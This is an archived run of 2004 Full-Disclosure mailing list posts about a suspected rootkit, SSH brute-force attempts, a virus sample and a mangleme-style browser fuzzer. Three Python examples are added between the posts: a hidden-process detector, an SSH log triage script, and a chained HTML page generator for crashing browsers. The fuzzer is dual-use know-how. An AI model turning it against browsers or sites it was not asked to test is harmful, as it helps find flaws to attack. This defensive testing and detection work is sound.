Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101

From: J.A. Terranson (measlmfn.org)
Date: Sat Oct 23 2004 - 13:08:27 CDT


On Fri, 22 Oct 2004, Danny wrote:

> > "Stack based overflow, bug discovered by Luigi Auriemma
> > aluigi.altervista.org
> > Tested working on Win2K, This public version crash on any WinXP, read
> > the code why.
> > The exploit bind a shellcode on the victim port 101."
>
> What does Microsoft say in response?

In a news conference where Mr. Bill was approached with this very
question, he is reported to have stated that "The Windows Operating System
is the most secure piece of crap, er, um, code ever written. Micro$loth
emphatically denies that this is anything but the most minor of issues,
and doesn't even rise to the level of threat necessary to achieve public
commentary. Therefore, Micro$loth has no comment. Thank you, and good
night.".

--
Yours,

J.A. Terranson
sysadminmfn.org
0xBD4A95BF

        "An ill wind is stalking
        while evil stars whir
        and all the gold apples
        go bad to the core"

        S. Plath, Temper of Time



 
RE: [Full-Disclosure] Help, possible rootkit

From: Alan Melia (Melmac) (alanmemelmac.co.uk)
Date: Sat Oct 23 2004 - 14:47:15 CDT


First check to see what processes are running. TaskList is built in, but I
would recommend:
http://www.sysinternals.com/ntw2k/freeware/procexp.shtml

Get to know your machine and what processes are running normally. With
25-30% CPU it should stick out like a sore thumb.

Oh yeah don't run as admin (see http://blogs.msdn.com/aaron_margosis).

Alan
 

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: 23 October 2004 17:05
To: Full Disclosure
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around
25 - 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions ?
Any more rootkit finding tools for Windows ?

Thanks
Bill



 
Re: [Full-Disclosure] Help, possible rootkit

From: BillyBob (billybobknobhotmail.com)
Date: Sat Oct 23 2004 - 15:30:22 CDT


I have run Process Explorer and Code Stuff Starter, but nothing shows up in the
list as using this 25-30% of my CPU. I also updated and ran PestPatrol,
NortonAV, etc., but nothing is detected, which is why I think I have a rootkit
that has patched the kernel and is therefore not allowing any of these programs
to detect it.

Anything else ?

----- Original Message -----
From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 4:47 PM
Subject: RE: [Full-Disclosure] Help, possible rootkit

> First check to see what processes are running. TaskList is built in but I
> would recommend.
> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>
> Get to know your machine and what processes are running normally. With
> 25-30% CPU it should stick out like a sore thumb.
>
> Oh yeah, don't run as admin (see http://blogs.msdn.com/aaron_margosis).
>
> Alan
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
> Sent: 23 October 2004 17:05
> To: Full Disclosure
> Subject: [Full-Disclosure] Help, possible rootkit
>
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have around
> 25 - 30 % usage, but when I open it, there is no process listed using this
> much.
> - I did a netstat, fport, openports and none of these show that I have any
> odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop. They
> stop if I reboot, but then start again.
>
> I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
> could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>
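
The advice in this thread boils down to one idea: a kernel-patching rootkit lies to the normal process list, so you need a second view it does not control (a boot CD, PatchFinder's timing view, Klister walking kernel structures). The script below is an added example, not code from any poster or from the rootkit.com tools, and it demonstrates two such cross-views on Linux `/proc`, since the Windows XP tools named above cannot be run here. View 1 compares the PIDs that `readdir(/proc)` admits to with the PIDs that answer `kill(pid, 0)`, the brute-force idea later used by unhide; view 2 compares the CPU time the kernel accounts for system-wide with the CPU time the visible processes add up to, which is exactly the "30% busy, nobody using it" symptom described. The `/proc` text samples at the bottom of the block are constructed.

```python
"""Added example, not from the thread or the rootkit.com tools: two "second
view" checks for a process hidden from the normal process list, on Linux
/proc (the Windows XP tools named above cannot run here).
View 1: PIDs readdir(/proc) admits to, versus PIDs that answer kill(pid, 0).
View 2: CPU time the kernel accounts for system-wide, versus CPU time the
visible processes add up to. The /proc text samples below are constructed.
"""
import os
from typing import Dict, Optional, Set


def listed_pids() -> Set[int]:
    """What ps / Task Manager-style tools see: numeric entries in /proc."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def probed_pids(max_pid: Optional[int] = None) -> Set[int]:
    """PIDs that exist according to kill(pid, 0); success and EPERM both mean
    'exists'. Real use should scan up to /proc/sys/kernel/pid_max."""
    if max_pid is None:
        max_pid = max(32768, os.getpid())
    found: Set[int] = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        found.add(pid)
    return found


def tgid_of(pid: int) -> Optional[int]:
    """Thread-group id from /proc/<pid>/status. kill(2) also answers for thread
    ids, which /proc does not list, so they must not be reported as hidden."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        pass
    return None


def hidden_pids(listed_before: Set[int], probed: Set[int],
                listed_after: Set[int]) -> Set[int]:
    """Probed PIDs absent from /proc both before and after the probe and not a
    thread of a listed process. Listing twice avoids flagging a process that
    was merely created mid-scan."""
    visible = listed_before | listed_after
    return {p for p in probed - visible if tgid_of(p) not in visible}


def self_check() -> Dict[str, object]:
    """Run view 1 live; this process must be in both views and not hidden."""
    before, probed = listed_pids(), probed_pids()
    hidden = hidden_pids(before, probed, listed_pids())
    me = os.getpid()
    return {"self_listed": me in before, "self_probed": me in probed,
            "self_hidden": me in hidden, "hidden": sorted(hidden)}


def busy_jiffies(proc_stat: str) -> int:
    """user + nice + system from the 'cpu' line of /proc/stat; irq/softirq
    time is excluded because no process is ever charged for it."""
    for line in proc_stat.splitlines():
        if line.startswith("cpu "):
            f = line.split()
            return int(f[1]) + int(f[2]) + int(f[3])
    raise ValueError("no aggregate cpu line in /proc/stat text")


def process_jiffies(pid_stat: str) -> int:
    """utime + stime (fields 14 and 15) of a /proc/<pid>/stat line; comm is cut
    at its last ')' since it may itself contain spaces or ')'."""
    rest = pid_stat.rsplit(")", 1)[1].split()  # rest[0] is field 3 (state)
    return int(rest[11]) + int(rest[12])


def unattributed_share(stat_before: str, stat_after: str,
                       procs_before: Dict[int, str],
                       procs_after: Dict[int, str]) -> float:
    """Fraction of CPU time over the interval that no visible process accounts
    for. Near 0 on a healthy box; a steady large share with an innocent-looking
    process list is the symptom described in the thread."""
    busy = busy_jiffies(stat_after) - busy_jiffies(stat_before)
    if busy <= 0:
        return 0.0
    seen = sum(process_jiffies(t) - (process_jiffies(procs_before[p])
                                     if p in procs_before else 0)
               for p, t in procs_after.items())
    return max(0.0, (busy - seen) / busy)


# Constructed samples: 1000 busy jiffies between samples, of which the visible
# processes account for 700, so 30% is unattributed.
STAT_BEFORE = "cpu  1000 0 500 8000 100 0 0 0 0 0\n"
STAT_AFTER = "cpu  1600 0 900 8400 100 0 0 0 0 0\n"
PROCS_BEFORE = {
    1: "1 (init) S 0 1 1 0 -1 4194560 100 0 0 0 50 50 0 0 20 0 1 0 5 1000 200",
    42: "42 (web (server)) S 1 42 42 0 -1 4194560 900 0 0 0 300 100 0 0 20 0 4 0 50 9000 800",
}
PROCS_AFTER = {
    1: "1 (init) S 0 1 1 0 -1 4194560 100 0 0 0 120 80 0 0 20 0 1 0 5 1000 200",
    42: "42 (web (server)) S 1 42 42 0 -1 4194560 900 0 0 0 600 300 0 0 20 0 4 0 50 9000 800",
    99: "99 (bash) S 1 99 99 0 -1 4194560 10 0 0 0 100 0 0 0 20 0 1 0 900 5000 300",
}
```

Neither view is proof on its own: view 1 can be fooled by a rootkit that also hooks `kill` and the `/proc/<pid>` lookups, and view 2 drifts a little on any box because of kernel work not charged to a process. What they give you is a disagreement between two views that a clean kernel keeps consistent, which is the same reason the thread recommends a boot CD.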


 
RE: [inbox] Re: [Full-Disclosure] Help, possible rootkit

From: Exibar (exibarthelair.com)
Date: Sat Oct 23 2004 - 15:45:30 CDT


Perhaps it is a piece of spyware and not a rootkit after all? Spyware would be
a more common item to find on a computer system than a rootkit. Run
Spybot Search & Destroy and Ad-Aware on your machine.

  How up to date is your Antivirus as well? Did you run a full antivirus
scan on your system to rule out a virus?

  Exibar

> -----Original Message-----
> From: Michael Rutledge [mailto:michael4447gmail.com]
> Sent: Saturday, October 23, 2004 1:11 PM
> To: BillyBob
> Cc: Full Disclosure
> Subject: [inbox] Re: [Full-Disclosure] Help, possible rootkit
>
>
> What type of software do you use on a regular basis, and what software
> have you installed recently? Is this a new install of XP? Also, have
> you installed SP2?
>
> Give us a little background about your system so that we can rule out
> common software gliches.
>
> -Michael
>
>
> On Sat, 23 Oct 2004 13:05:29 -0300, BillyBob
> <billybobknobhotmail.com> wrote:
> > I have noticed that my XP system is behaving like I have a rootkit.
> >
> > - My mouse is jumpy (it freezes for a second when I move it around the
> > desktop) and the minimized Taskmanager in the systray shows I have around
> > 25 - 30 % usage, but when I open it, there is no process listed using this
> > much.
> > - I did a netstat, fport, openports and none of these show that I have any
> > odd ports open or any connections established.
> > - even when I disconnect from the Internet these symptoms do not stop. They
> > stop if I reboot, but then start again.
> >
> > I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
> > could not find anything.
> >
> > Any more suggestions ?
> > Any more rootkit finding tools for Windows ?
> >
> > Thanks
> > Bill
 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Barrie Dempster (barriereboot-robot.net)
Date: Sat Oct 23 2004 - 17:49:12 CDT


This virus is very detectable. It is important to verify a file with a
variety of vendors before labelling it "new" (never "undetectable").
Your web page only proved that Hotmail's AV scanners didn't pick it up,
nothing more.

---- Pasted results from www.virustotal.com ----
Results of a file scan
This is the report of the scanning done over "details.scr" file that
VirusTotal processed on 10/23/2004 at 09:32:12.

Antivirus     Version          Update       Result
BitDefender   7.0              10.22.2004   Win32.Mabutu.Amm
ClamWin       devel-20041018   10.22.2004   Worm.Mabutu.A-unp
eTrust-Iris   7.1.194.0        10.22.2004   Win32/Mabutu.A.Worm
F-Prot        3.15b            10.22.2004   W32/Mabuto.Bmm
Kaspersky     4.0.2.24         10.23.2004   I-Worm.Mabutu.a
NOD32v2       1.904            10.23.2004   Win32/Mabutu.A
Norman        5.70.10          10.22.2004   Mabutu.Amm
Panda         7.02.00          10.22.2004   W32/Mabutu.A.worm
Sybari        7.5.1314         10.23.2004   Mabutu.Am
Symantec      8.0              10.22.2004   W32.Mota.Bmm
---- END OF Pasted results from www.virustotal.com ----

On Fri, 2004-10-22 at 22:28 +0000, Farrukh Hussain wrote:
> Hi,
> Today I got an e-mail from "69.197.83.68", a CANADA ISP, which has an
> undetectable virus. Well, I downloaded this file but I didn't run it
> because I know it is a virus, and now I am complaining to the "rogers.com"
> ISP about this matter, because I got this file from this ISP. It is
> abuse of internet service. I hope they will take some action about it.
> And also I am informing the security group about this matter.
>
> http://www.Anti-Hacking.info/undetectable_virus/index.html
>
>
>
> Best Regards from,
> Farrukh Hussain
> Security Group in Pakistan.
>
--
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBet/nsYtTQpYCX9ARAs9RAJ4lKkioLDVEqS5FQjFyshoLxKoYMACgtNzm
/izMXr3xRwpP0LomRe9baCk=
=UYDQ
-----END PGP SIGNATURE-----

 
Re: [Full-Disclosure] Help, possible rootkit

From: Azerail (Azerailsupersecretninjaskills.com)
Date: Sat Oct 23 2004 - 21:20:43 CDT


On Sat, 23 Oct 2004, BillyBob wrote:

> I have run Process Explorer, Code Stuff Starter but nothing shows up in the
> list as using this 25-30% of my CPU. I also updated and ran PestPatrol,
> NortonAV, etc but nothing is detected which is why I think I have a rootkit
> that has patched the kernel and therefore not allowing any of these programs
> to detect it.
>
> Anything else ?
>

Try cleaning your mouse.

Azerail
--
Thanks to the printing press, the deviant smart people managed to capture their
genius and communicate it without having to pass it on genetically. Evolution
was short-circuited. We got knowledge and technology before we got
intelligence.
                        -- Scott Adams, The Dilbert Principle
  

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Azerail (Azerailsupersecretninjaskills.com)
Date: Sat Oct 23 2004 - 21:19:11 CDT


Can we let this thread die? I mean seriously, we all get the point
that people's virus scanners can detect it and the importance of
updating virus definitions and that ISP's aren't really going to do
anything about it nor should they. Everyone chiming in with the same
two cents is getting real old.

Azerail

 
Re: [Full-Disclosure] Help, possible rootkit

From: MN Vasquez (mnvalumni.princeton.edu)
Date: Sat Oct 23 2004 - 22:04:48 CDT


Any odd traffic coming to or from this machine? What is a sniffer telling
you?

I might've missed it, but is this a home user machine or in a business
place?

Do you have issues running in safe mode? If you don't, then it would sound
like the rootkit's not running, which means you can probably look at some of
the normal places for a file/processes loading/starting.

I don't know about the rest of the list, but I haven't seen or heard of too
many process hiding xp rootkits that are undetectable by some of the basic
methods mentioned. See www.rootkit.com. At least, not floating around on a
single PC that sounds like an unlikely "high value" target. It seems much
more likely that XP or an application is just crapping out on you, and if
you can't figure it out, reinstall. If nothing is revealed after trying
some of the methods already suggested here and by others, I think the
likelihood -- given the info you've told us so far -- makes it unlikely
that it's a rootkit.

My 2 cents.

> ----- Original Message -----
> From: "BillyBob" <billybobknobhotmail.com>
> To: "Alan Melia (Melmac)" <alanmemelmac.co.uk>; "'Full Disclosure'"
> <full-disclosurelists.netsys.com>
> Sent: Saturday, October 23, 2004 1:30 PM
> Subject: Re: [Full-Disclosure] Help, possible rootkit
>
>
>> I have run Process Explorer, Code Stuff Starter but nothing shows up in
>> the list as using this 25-30% of my CPU. I also updated and ran PestPatrol,
>> NortonAV, etc but nothing is detected which is why I think I have a
>> rootkit that has patched the kernel and therefore not allowing any of these
>> programs to detect it.
>>
>> Anything else ?
>>
>>
>> ----- Original Message -----
>> From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
>> To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
>> <full-disclosurelists.netsys.com>
>> Sent: Saturday, October 23, 2004 4:47 PM
>> Subject: RE: [Full-Disclosure] Help, possible rootkit
>>
>>
>>> First check to see what processes are running. TaskList is built in but
>>> I
>>> would recommend.
>>> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>>>
>>> Get to know your machine and what processes are running normally. With
>>> 25-30% CPU it should stick out like a sore thumb.
>>>
>>> Oh yeah don't run as admin (see http://blogs.msdn.com/aaron_margosis).
>>>
>>> Alan
>>>
>>>
>>> -----Original Message-----
>>> From: full-disclosure-adminlists.netsys.com
>>> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
>>> Sent: 23 October 2004 17:05
>>> To: Full Disclosure
>>> Subject: [Full-Disclosure] Help, possible rootkit
>>>
>>> I have noticed that my XP system is behaving like I have a rootkit.
>>>
>>> - My mouse is jumpy (it freezes for a second when I move it around the
>>> desktop) and the minimized Task Manager in the systray shows I have around
>>> 25 - 30 % usage, but when I open it, there is no process listed using this
>>> much.
>>> - I did a netstat, fport, openports and none of these show that I have any
>>> odd ports open or any connections established.
>>> - even when I disconnect from the Internet these symptoms do not stop. They
>>> stop if I reboot, but then start again.
>>>
>>> I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
>>> could not find anything.
>>>
>>> Any more suggestions ?
>>> Any more rootkit finding tools for Windows ?
>>>
>>> Thanks
>>> Bill

 
Re: [Full-Disclosure] Help, possible rootkit

From: MN Vasquez (mnvalumni.princeton.edu)
Date: Sat Oct 23 2004 - 21:16:56 CDT


The bootable CD has already been mentioned. Have you scanned it for open
ports?

----- Original Message -----
From: "BillyBob" <billybobknobhotmail.com>
To: "Alan Melia (Melmac)" <alanmemelmac.co.uk>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 1:30 PM
Subject: Re: [Full-Disclosure] Help, possible rootkit

> I have run Process Explorer, Code Stuff Starter but nothing shows up in the
> list as using this 25-30% of my CPU. I also updated and ran PestPatrol,
> NortonAV, etc but nothing is detected which is why I think I have a
> rootkit that has patched the kernel and therefore not allowing any of these
> programs to detect it.
>
> Anything else ?
>
>
> ----- Original Message -----
> From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
> To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
> <full-disclosurelists.netsys.com>
> Sent: Saturday, October 23, 2004 4:47 PM
> Subject: RE: [Full-Disclosure] Help, possible rootkit
>
>
>> First check to see what processes are running. TaskList is built in but
>> I
>> would recommend.
>> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>>
>> Get to know your machine and what processes are running normally. With
>> 25-30% CPU it should stick out like a sore thumb.
>>
>> Oh yeah don't run as admin (see http://blogs.msdn.com/aaron_margosis).
>>
>> Alan
>>
>>
>> -----Original Message-----
>> From: full-disclosure-adminlists.netsys.com
>> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
>> Sent: 23 October 2004 17:05
>> To: Full Disclosure
>> Subject: [Full-Disclosure] Help, possible rootkit
>>
>> I have noticed that my XP system is behaving like I have a rootkit.
>>
>> - My mouse is jumpy (it freezes for a second when I move it around the
>> desktop) and the minimized Task Manager in the systray shows I have around
>> 25 - 30 % usage, but when I open it, there is no process listed using this
>> much.
>> - I did a netstat, fport, openports and none of these show that I have any
>> odd ports open or any connections established.
>> - even when I disconnect from the Internet these symptoms do not stop. They
>> stop if I reboot, but then start again.
>>
>> I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
>> could not find anything.
>>
>> Any more suggestions ?
>> Any more rootkit finding tools for Windows ?
>>
>> Thanks
>> Bill

 
[Full-Disclosure] Re: Any update on SSH brute force attempts?

From: Miriam Chan (miriamchangeocities.com)
Date: Sat Oct 23 2004 - 20:43:17 CDT


Jay Libove wrote:
> Recently, a couple of times a week, I see repeats of this which now have
> as many as fifty different accounts being attacked. (Almost none of which
> exist on my server, and none of which will have common passwords
> thankyouverymuch).

By the way, I started to suspect that the attacks were intentional (not just
some games by some script kiddies.) I had some servers accepting SSH
connections from anywhere (this is for easy access, and I know it is not
a very good idea.)

Before I set up a Portsentry-like mechanism to block the bad hosts, I got at
least 5-6 attempts per day. Afterward, I got nearly none (just some 1-2
attempts a day.) The change looks simply too big to me. If I got some
number of attacks a day, I would expect the same number of attacks the next
day if the attacks were done automatically by some virus/worms. I wish that
it was done by some virus, because (I think) a virus is not more malicious
than a planned cracking behaviour.

Does anyone have the same observations as me? It would be great if you saw
it and shared your ideas.

Miriam.
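
The pattern Jay and Miriam describe (many usernames from one source, most of them nonexistent on the server) is easy to pull out of sshd's syslog output, and the per-source counts are what a Portsentry-style blocker keys on. The script below is an added example, not code from either poster: it parses "Failed password" lines in both the older OpenSSH "illegal user" and the later "invalid user" wording, flags sources by attempt count or by the number of distinct usernames tried, and emits tcp-wrappers entries for /etc/hosts.deny. The log lines are constructed for the example; the thresholds are the example's own choices.

```python
"""Triage of sshd brute-force attempts from syslog-format auth logs.

Added example, not from the thread. Parses "Failed password" lines (both the
older OpenSSH "illegal user" and the later "invalid user" wording), counts
attempts and distinct usernames per source address, and emits tcp-wrappers
style deny entries for offenders. The log lines below are constructed.
"""
import re
from collections import defaultdict

# Constructed sample: one host cycling through accounts, one real user with a typo.
SAMPLE_LOG = """\
Oct 23 03:12:01 web sshd[2214]: Failed password for illegal user test from 10.0.0.5 port 44512 ssh2
Oct 23 03:12:03 web sshd[2216]: Failed password for illegal user guest from 10.0.0.5 port 44520 ssh2
Oct 23 03:12:05 web sshd[2218]: Failed password for illegal user admin from 10.0.0.5 port 44531 ssh2
Oct 23 03:12:07 web sshd[2220]: Failed password for root from 10.0.0.5 port 44540 ssh2
Oct 23 03:12:09 web sshd[2222]: Failed password for invalid user oracle from 10.0.0.5 port 44548 ssh2
Oct 23 09:40:12 web sshd[3101]: Failed password for alice from 203.0.113.7 port 51000 ssh2
Oct 23 09:40:20 web sshd[3103]: Accepted publickey for alice from 203.0.113.7 port 51002 ssh2
"""

FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:(?P<nouser>illegal|invalid) user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failed(line):
    """Return (user, ip, account_exists) for a failed-password line, else None."""
    m = FAILED.search(line)
    if not m:
        return None
    return m.group("user"), m.group("ip"), m.group("nouser") is None


def summarize(log_text):
    """Per source IP: number of attempts, set of usernames, count of nonexistent accounts."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set(), "nonexistent": 0})
    for line in log_text.splitlines():
        parsed = parse_failed(line)
        if parsed is None:
            continue  # accepted logins, disconnects, etc.
        user, ip, exists = parsed
        entry = stats[ip]
        entry["attempts"] += 1
        entry["users"].add(user)
        if not exists:
            entry["nonexistent"] += 1
    return dict(stats)


def offenders(log_text, min_attempts=5, min_users=3):
    """IPs that either hammer one account or walk a list of usernames.

    Counting distinct usernames catches the dictionary-of-accounts pattern
    from the thread even when the per-account attempt count stays low.
    """
    flagged = []
    for ip, entry in summarize(log_text).items():
        if entry["attempts"] >= min_attempts or len(entry["users"]) >= min_users:
            flagged.append(ip)
    return sorted(flagged)


def hosts_deny_lines(ips):
    """tcp-wrappers entries for /etc/hosts.deny (sshd must be built with wrappers)."""
    return [f"sshd: {ip}" for ip in ips]


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(f"{ip:15} attempts={entry['attempts']} users={sorted(entry['users'])} "
              f"nonexistent={entry['nonexistent']}")
    print("\n".join(hosts_deny_lines(offenders(SAMPLE_LOG))))
```

Blocking by source address is only a nuisance to an attacker with many hosts, which is the point behind Jay's remark about non-common passwords: the real control is key-only authentication, with the deny list as noise reduction.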

 
Re: [Full-Disclosure] Help, possible rootkit

From: Gregh (chowsozemail.com.au)
Date: Sat Oct 23 2004 - 23:36:13 CDT


----- Original Message -----
From: "MN Vasquez" <mnvalumni.princeton.edu>
To: <full-disclosurelists.netsys.com>
Sent: Sunday, October 24, 2004 1:04 PM
Subject: Re: [Full-Disclosure] Help, possible rootkit

>
> I don't know about the rest of the list, but I haven't seen or heard of too
> many process hiding xp rootkits that are undetectable by some of the basic
> methods mentioned.

Just FYI of anyone really interested in why a mouse is doing odd things since installing SP2 on XP, it is actually more common than you think and in what I have seen to date (which is, by no means, long enough to be 100% sure) limited to USB mouse users on XP using SP2. Put the mouse up the top quarter of the screen near the right hand edge and almost always, the user's pointer drifts left. Revert to SP1 and it doesn't happen.

I haven't looked for a fix as yet but I suspect it is either just a mouse driver reinstall or an update needed.

Note - for the paranoid, I don't claim this as the answer in every case. It has been what has happened on about 30 I have seen so far. Doesn't appear to affect a PS2 port mouse.

Greg.

 
[Full-Disclosure] python does mangleme (with IE bugs!)

From: ned (ndfelinemenace.org)
Date: Sat Oct 23 2004 - 23:36:32 CDT


i've made a port of mangleme:
http://felinemenace.org/~nd/htmler.py
with a few extra quirks (such as file extensions/url types)

it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
http://felinemenace.org/~nd/crash_ie/

They are not the null pointer dereference that Michal found (which
curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
probably non-exploitable problems!

htmler.py doesn't use CGI like mangleme but generates webpages in the
directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
load 1.html and so on with little user interaction required!

anyway, if you find bugs with it, don't sell to anyone/notify vendors!
- nd

--
http://felinemenace.org/~nd - "eat a duck"
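
The workflow ned describes (a directory of numbered pages, each refreshing to the next so the browser walks the whole set unattended) is the part of a mangleme-style fuzzer worth getting right, because a crash is useless unless the page that caused it can be regenerated. The generator below is an added example, not htmler.py or Zalewski's mangleme; every page is a pure function of (seed, index), so a crashing case is reproducible from those two numbers alone. The tag and attribute lists and the value mutators are the example's own choices.

```python
"""Chained-page HTML fuzzer in the mangleme style.

Added example, not ned's htmler.py or Zalewski's mangleme. It generates
pages 0.html .. n-1.html in a directory; each page carries a meta refresh
to the next, so pointing a browser at 0.html walks the whole set with no
user interaction. Every page is derived from (seed, index) only, so a page
that crashes the browser can be regenerated exactly from those two numbers.
Tag and attribute lists below are the example's own choices.
"""
import os
import random

TAGS = ["a", "b", "div", "font", "form", "frame", "frameset", "iframe", "img",
        "input", "marquee", "object", "select", "table", "td", "textarea", "tr"]
ATTRS = ["align", "border", "class", "cols", "height", "href", "id", "name",
         "rows", "size", "src", "style", "type", "width"]
BOUNDARY_INTS = [0, 1, -1, 255, 256, 2**15 - 1, 2**16 - 1, 2**31 - 1, 2**32 - 1, -2**31]


def random_value(rng):
    """One attribute value: boundary integers, long runs, percent-escapes, raw bytes."""
    kind = rng.randrange(5)
    if kind == 0:
        return str(rng.choice(BOUNDARY_INTS))
    if kind == 1:
        return "A" * rng.choice([1, 256, 1024, 4096, 65536])
    if kind == 2:
        return "%" + "".join(rng.choice("0123456789abcdef") for _ in range(rng.randrange(1, 9)))
    if kind == 3:
        return "".join(chr(rng.randrange(1, 256)) for _ in range(rng.randrange(1, 64)))
    return "javascript:" + "x" * rng.randrange(1, 1024)


def random_tag(rng):
    """An element with 0-5 attributes; quoting is sometimes wrong and the close tag sometimes missing."""
    tag = rng.choice(TAGS)
    attrs = []
    for _ in range(rng.randrange(0, 6)):
        quote = rng.choice(['"', "'", ""])
        attrs.append(f"{rng.choice(ATTRS)}={quote}{random_value(rng)}{quote}")
    opened = f"<{tag} {' '.join(attrs)}>" if attrs else f"<{tag}>"
    closed = f"</{tag}>" if rng.random() < 0.6 else ""
    return opened + closed


def make_page(index, count, seed):
    """Page `index` of a chain of `count`; refreshes to the next page (wrapping to 0)."""
    rng = random.Random(f"{seed}:{index}")
    nxt = (index + 1) % count
    body = "\n".join(random_tag(rng) for _ in range(rng.randrange(5, 40)))
    return ("<html><head>"
            f'<meta http-equiv="refresh" content="0;url={nxt}.html">'
            f"<title>case {seed}:{index}</title></head><body>\n"
            f"{body}\n</body></html>")


def write_chain(directory, count, seed=0):
    """Write `count` pages into `directory`; returns the path of the entry page."""
    os.makedirs(directory, exist_ok=True)
    for i in range(count):
        with open(os.path.join(directory, f"{i}.html"), "w", encoding="latin-1") as fh:
            fh.write(make_page(i, count, seed))
    return os.path.join(directory, "0.html")


if __name__ == "__main__":
    print("open", write_chain("html1", 500, seed=1), "in the browser under test")
```

When the browser dies, the title of the last page it loaded (case seed:index) is all you need to keep; regenerate that one page with make_page() and minimise it by hand.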

 
Re: [Full-Disclosure] Update: Web browsers - a mini-farce (MSIE gives in)

From: Daniel Veditz (dveditzcruzio.com)
Date: Sun Oct 24 2004 - 02:58:21 CDT


Michal Zalewski wrote:
>
> I have no data on whether any of the vendors bothered to run my scripts to
> find any further problems that are bound to surface.

Yes, thank you. Mozilla testers have found additional crashing testcases and
we will add the tool to our regular testing cycle.

-Dan Veditz

 
[Full-Disclosure] RE: Full-Disclosure digest

From: digitalchaos (digitalchaosgawab.com)
Date: Fri Sep 03 2004 - 04:27:01 CDT


Why are there viruses being transmitted through this newsgroup??

OUTPUT FROM MCAFEE:
****************** McAfee VirusScan ************************
******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
*********************************************************************

McAfee VirusScan has detected a potential threat in this e-mail
sent by full-disclosure-requestlists.netsys.com.
The following actions were attempted on each suspicious part.
We strongly recommend that you report this virus-related activity
to full-disclosure-requestlists.netsys.com.

 The attachment "E-mail body" is infected with the W32/Bagle.aaMM
Virus(es).
This attachment has been quarantined.

This is not the only message I have received like this

Some were infected by NETSKY, various zip/pif virus, and such.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
full-disclosure-requestlists.netsys.com
Sent: Friday, October 22, 2004 9:24 AM
To: full-disclosurelists.netsys.com
Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs

 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Sun Oct 24 2004 - 05:32:53 CDT


Le vendredi 03 septembre 2004 à 05:27 -0400, digitalchaos a écrit :
> Why are there viruses being transmitted through this newsgroup??

Because some worms gather email addresses from address books, emails
or HTML content, and those can contain the Full Disclosure email address.

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: Honza Vlach (janusvolny.cz)
Date: Sun Oct 24 2004 - 05:59:16 CDT


Oh no, not again!!!
Honza

> Why are there viruses being transmitted through this newsgroup??
--
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBe4sESVzvioqX7FkRAtccAJwPoudH8m7h81BCQ8v5vyi+N85/zQCg+bgp
a6IOciNhK9Ql+ZZwHgyTS8o=
=U4EG
-----END PGP SIGNATURE-----

 
